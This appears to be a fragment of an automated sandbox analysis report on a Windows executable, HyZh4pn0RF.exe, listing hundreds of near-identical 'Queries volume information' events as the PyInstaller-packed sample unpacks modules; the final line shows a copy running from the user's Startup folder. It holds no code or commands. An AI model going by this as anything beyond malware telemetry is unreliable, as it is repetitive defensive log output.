            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\select.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\_queue.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\_ssl.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\_asyncio.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\_overlapped.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\pyexpat.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\_sqlite3.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\_hashlib.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442 VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\_uuid.pyd VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI56522\Crypto VolumeInformationJump to behavior
